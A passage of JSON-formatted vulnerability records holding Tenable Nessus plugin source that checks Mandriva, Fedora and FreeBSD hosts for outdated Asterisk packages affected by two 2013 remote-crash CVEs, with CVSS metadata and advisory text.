value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-dahdi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-fax\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-festival\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-ices\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-jabber\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-jack\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-lua\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-minivm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-mobile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-mp3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-ooh323\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-osp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-oss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-pktccops\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-portaudio\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-radius\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-saycountpl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-skinny\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-speex\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-tds\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-unistim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail-plain\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64asteriskssl1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/08/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-addons-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-devel-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-firmware-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-gui-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-alsa-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-calendar-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-cel-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-corosync-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-curl-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-dahdi-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-fax-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-festival-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-ices-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-jabber-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-jack-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-ldap-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-lua-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-minivm-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-mobile-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-mp3-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-mysql-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-ooh323-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-osp-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-oss-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-pgsql-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-pktccops-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-portaudio-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-radius-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-saycountpl-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-skinny-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-snmp-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-speex-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-sqlite-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-tds-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-unistim-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-voicemail-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-voicemail-imap-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-voicemail-plain-11.5.1-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64asteriskssl1-11.5.1-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:58:48", "description": "- Thu Aug 29 2013 Jeffrey Ollie <jeff at ocjtech.us> - 11.5.1-2 :\n\n - Enable hardened build BZ#954338\n\n - Significant clean ups\n\n - Thu Aug 29 2013 Jeffrey Ollie <jeff at ocjtech.us> - 11.5.1-1 :\n\n - The Asterisk Development Team has announced security releases for Certified\n\n - Asterisk 1.8.15, 11.2, and Asterisk 1.8, 10, and 11.\n The available security releases\n\n - are released as versions 1.8.15-cert2, 11.2-cert2, 1.8.23.1, 10.12.3, 10.12.3-digiumphones,\n\n - and 11.5.1.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2013-09-14T00:00:00", "type": "nessus", "title": "Fedora 18 : asterisk-11.5.1-2.fc18 (2013-15567)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:asterisk", "cpe:/o:fedoraproject:fedora:18"], "id": "FEDORA_2013-15567.NASL", "href": "https://www.tenable.com/plugins/nessus/69887", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-15567.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69887);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n script_bugtraq_id(62021, 62022);\n script_xref(name:\"FEDORA\", value:\"2013-15567\");\n\n script_name(english:\"Fedora 18 : asterisk-11.5.1-2.fc18 (2013-15567)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Thu Aug 29 2013 Jeffrey Ollie <jeff at ocjtech.us> -\n 11.5.1-2 :\n\n - Enable hardened build BZ#954338\n\n - Significant clean ups\n\n - Thu Aug 29 2013 Jeffrey Ollie <jeff at ocjtech.us> -\n 11.5.1-1 :\n\n - The Asterisk Development Team has announced security\n releases for Certified\n\n - Asterisk 1.8.15, 11.2, and Asterisk 1.8, 10, and 11.\n The available security releases\n\n - are released as versions 1.8.15-cert2, 11.2-cert2,\n 1.8.23.1, 10.12.3, 10.12.3-digiumphones,\n\n - and 11.5.1.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1002044\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-September/115639.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4f6d185d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected asterisk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/08/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"asterisk-11.5.1-2.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"asterisk\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:57:01", "description": "The Asterisk project reports :\n\nRemote Crash From Late Arriving SIP ACK With SDP\n\nRemote Crash when Invalid SDP is sent in SIP Request", "cvss3": {}, "published": "2013-08-29T00:00:00", "type": "nessus", "title": "FreeBSD : asterisk -- multiple vulnerabilities (fd2bf3b5-1001-11e3-ba94-0025905a4771)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:asterisk10", "p-cpe:/a:freebsd:freebsd:asterisk11", "p-cpe:/a:freebsd:freebsd:asterisk18", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_FD2BF3B5100111E3BA940025905A4771.NASL", "href": "https://www.tenable.com/plugins/nessus/69499", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69499);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n\n script_name(english:\"FreeBSD : asterisk -- multiple vulnerabilities (fd2bf3b5-1001-11e3-ba94-0025905a4771)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Asterisk project reports :\n\nRemote Crash From Late Arriving SIP ACK With SDP\n\nRemote Crash when Invalid SDP is sent in SIP Request\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-004.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-005.html\"\n );\n # https://www.asterisk.org/security\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.asterisk.org/downloads/security-advisories\"\n );\n # https://vuxml.freebsd.org/freebsd/fd2bf3b5-1001-11e3-ba94-0025905a4771.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?094717d7\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:asterisk10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:asterisk11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:asterisk18\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/08/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/08/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/08/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"asterisk11>11.*<11.5.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"asterisk10>10.*<10.12.3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"asterisk18>1.8.*<1.8.21.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:59:37", "description": "- Thu Aug 29 2013 Jeffrey Ollie <jeff at ocjtech.us> - 11.5.1-2 :\n\n - Enable hardened build BZ#954338\n\n - Significant clean ups\n\n - Thu Aug 29 2013 Jeffrey Ollie <jeff at ocjtech.us> - 11.5.1-1 :\n\n - The Asterisk Development Team has announced security releases for Certified\n\n - Asterisk 1.8.15, 11.2, and Asterisk 1.8, 10, and 11.\n The available security releases\n\n - are released as versions 1.8.15-cert2, 11.2-cert2, 1.8.23.1, 10.12.3, 10.12.3-digiumphones,\n\n - and 11.5.1.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2013-09-14T00:00:00", "type": "nessus", "title": "Fedora 19 : asterisk-11.5.1-2.fc19 (2013-15560)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:asterisk", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2013-15560.NASL", "href": "https://www.tenable.com/plugins/nessus/69886", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-15560.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69886);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n script_bugtraq_id(62021, 62022);\n script_xref(name:\"FEDORA\", value:\"2013-15560\");\n\n script_name(english:\"Fedora 19 : asterisk-11.5.1-2.fc19 (2013-15560)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Thu Aug 29 2013 Jeffrey Ollie <jeff at ocjtech.us> -\n 11.5.1-2 :\n\n - Enable hardened build BZ#954338\n\n - Significant clean ups\n\n - Thu Aug 29 2013 Jeffrey Ollie <jeff at ocjtech.us> -\n 11.5.1-1 :\n\n - The Asterisk Development Team has announced security\n releases for Certified\n\n - Asterisk 1.8.15, 11.2, and Asterisk 1.8, 10, and 11.\n The available security releases\n\n - are released as versions 1.8.15-cert2, 11.2-cert2,\n 1.8.23.1, 10.12.3, 10.12.3-digiumphones,\n\n - and 11.5.1.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1002044\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-September/115650.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?552696dd\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected asterisk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/08/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ 